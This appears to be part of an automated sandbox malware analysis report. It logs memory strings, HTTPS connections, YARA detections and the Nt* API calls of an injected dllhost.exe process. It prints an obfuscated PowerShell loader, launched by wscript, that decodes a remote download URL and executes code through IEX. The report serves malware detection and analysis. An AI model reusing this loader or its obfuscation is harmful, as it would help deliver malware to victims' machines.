              Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/NAZAN.gif)
              Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/aslan.gif
              Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/cropped-aslanaa-180x180.jpeg
              Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/cropped-aslanaa-192x192.jpeg
              Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/cropped-aslanaa-270x270.jpeg
              Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/cropped-aslanaa-32x32.jpeg
              Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/yatayreklam.jpg
              Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://schema.org/WPHeader
              Source: msiexec.exeString found in binary or memory: https://ssl.gstatic.c
              Source: msiexec.exe, msiexec.exe, 00000008.00000003.2198426789.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254733813.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687921782.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: msiexec.exe, msiexec.exe, 00000008.00000003.2198426789.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254733813.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687921782.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: msiexec.exe, msiexec.exe, 00000008.00000003.2198426789.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254733813.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687921782.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: msiexec.exe, msiexec.exe, 00000008.00000003.2198426789.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254733813.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687921782.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: msiexec.exe, msiexec.exe, 00000008.00000003.2198426789.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254733813.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687921782.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.4:49740 version: TLS 1.2

              System Summary

              barindex
              Source: amsi32_4312.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6044, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUn
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUnJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03844340 NtSetContextThread,LdrInitializeThunk,11_2_03844340
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03844650 NtSuspendThread,LdrInitializeThunk,11_2_03844650
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038435C0 NtCreateMutant,LdrInitializeThunk,11_2_038435C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842B60 NtClose,LdrInitializeThunk,11_2_03842B60
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842AD0 NtReadFile,LdrInitializeThunk,11_2_03842AD0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038439B0 NtGetContextThread,LdrInitializeThunk,11_2_038439B0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842FB0 NtResumeThread,LdrInitializeThunk,11_2_03842FB0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842FE0 NtCreateFile,LdrInitializeThunk,11_2_03842FE0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842F30 NtCreateSection,LdrInitializeThunk,11_2_03842F30
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842EE0 NtQueueApcThread,LdrInitializeThunk,11_2_03842EE0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842DD0 NtDelayExecution,LdrInitializeThunk,11_2_03842DD0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_03842DF0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842D10 NtMapViewOfSection,LdrInitializeThunk,11_2_03842D10
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_03842D30
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_03842CA0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842C60 NtCreateKey,LdrInitializeThunk,11_2_03842C60
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_03842C70
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03843090 NtSetValueKey,11_2_03843090
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03843010 NtOpenDirectoryObject,11_2_03843010
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842B80 NtQueryInformationFile,11_2_03842B80
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842BA0 NtEnumerateValueKey,11_2_03842BA0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842BE0 NtQueryValueKey,11_2_03842BE0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842BF0 NtAllocateVirtualMemory,11_2_03842BF0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842AB0 NtWaitForSingleObject,11_2_03842AB0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842AF0 NtWriteFile,11_2_03842AF0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842F90 NtProtectVirtualMemory,11_2_03842F90
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842FA0 NtQuerySection,11_2_03842FA0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842F60 NtCreateProcessEx,11_2_03842F60
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842E80 NtReadVirtualMemory,11_2_03842E80
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842EA0 NtAdjustPrivilegesToken,11_2_03842EA0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842E30 NtWriteVirtualMemory,11_2_03842E30
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842DB0 NtEnumerateKey,11_2_03842DB0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842D00 NtSetInformationFile,11_2_03842D00
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03843D10 NtOpenProcessToken,11_2_03843D10
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03843D70 NtOpenThread,11_2_03843D70
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842CC0 NtQueryVirtualMemory,11_2_03842CC0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842CF0 NtOpenProcess,11_2_03842CF0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03842C00 NtQueryInformationProcess,11_2_03842C00
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03109250 NtClose,11_2_03109250
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_031090C0 NtReadFile,11_2_031090C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03108F50 NtCreateFile,11_2_03108F50
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B75BEA21_2_00007FFD9B75BEA2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B75B0F61_2_00007FFD9B75B0F6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B82A42A1_2_00007FFD9B82A42A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04BCEB706_2_04BCEB70
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04BCF4406_2_04BCF440
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04BCE8286_2_04BCE828
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0385739A11_2_0385739A
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FD34C11_2_037FD34C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D03E611_2_038D03E6
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381E3F011_2_0381E3F0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C132D11_2_038C132D
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038CA35211_2_038CA352
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038152A011_2_038152A0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382B2C011_2_0382B2C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038902C011_2_038902C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B12ED11_2_038B12ED
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382D2F011_2_0382D2F0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B027411_2_038B0274
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF17211_2_037FF172
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D01AA11_2_038D01AA
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381B1B011_2_0381B1B0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C81CC11_2_038C81CC
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380010011_2_03800100
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038AA11811_2_038AA118
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038DB16B11_2_038DB16B
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0384516C11_2_0384516C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038170C011_2_038170C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038BF0CC11_2_038BF0CC
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C70E911_2_038C70E9
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038CF0E011_2_038CF0E0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038CF7B011_2_038CF7B0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380C7C011_2_0380C7C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383475011_2_03834750
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381077011_2_03810770
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C16CC11_2_038C16CC
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382C6E011_2_0382C6E0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D059111_2_038D0591
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038AD5B011_2_038AD5B0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381053511_2_03810535
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C757111_2_038C7571
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038BE4F611_2_038BE4F6
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038CF43F11_2_038CF43F
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C244611_2_038C2446
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380146011_2_03801460
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382FB8011_2_0382FB80
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C6BD711_2_038C6BD7
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03885BF011_2_03885BF0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0384DBF911_2_0384DBF9
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038CAB4011_2_038CAB40
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038CFB7611_2_038CFB76
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380EA8011_2_0380EA80
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03855AA011_2_03855AA0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038ADAAC11_2_038ADAAC
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038BDAC611_2_038BDAC6
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038CFA4911_2_038CFA49
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C7A4611_2_038C7A46
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03883A6C11_2_03883A6C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038129A011_2_038129A0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038DA9A611_2_038DA9A6
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381995011_2_03819950
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382B95011_2_0382B950
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382696211_2_03826962
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038138E011_2_038138E0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383E8F011_2_0383E8F0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0387D80011_2_0387D800
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381284011_2_03812840
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381A84011_2_0381A840
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037F68B811_2_037F68B8
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03811F9211_2_03811F92
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388EFA011_2_0388EFA0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038CFFB111_2_038CFFB1
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03802FC811_2_03802FC8
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038CFF0911_2_038CFF09
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852F2811_2_03852F28
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03830F3011_2_03830F30
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03884F4011_2_03884F40
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03822E9011_2_03822E90
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038CCE9311_2_038CCE93
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03819EB011_2_03819EB0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038CEEDB11_2_038CEEDB
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038CEE2611_2_038CEE26
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03810E5911_2_03810E59
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03828DBF11_2_03828DBF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382FDC011_2_0382FDC0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380ADE011_2_0380ADE0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381AD0011_2_0381AD00
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03813D4011_2_03813D40
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C1D5A11_2_038C1D5A
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C7D7311_2_038C7D73
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B0CB511_2_038B0CB5
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03800CF211_2_03800CF2
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038CFCF211_2_038CFCF2
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03810C0011_2_03810C00
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03889C3211_2_03889C32
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030F1C3011_2_030F1C30
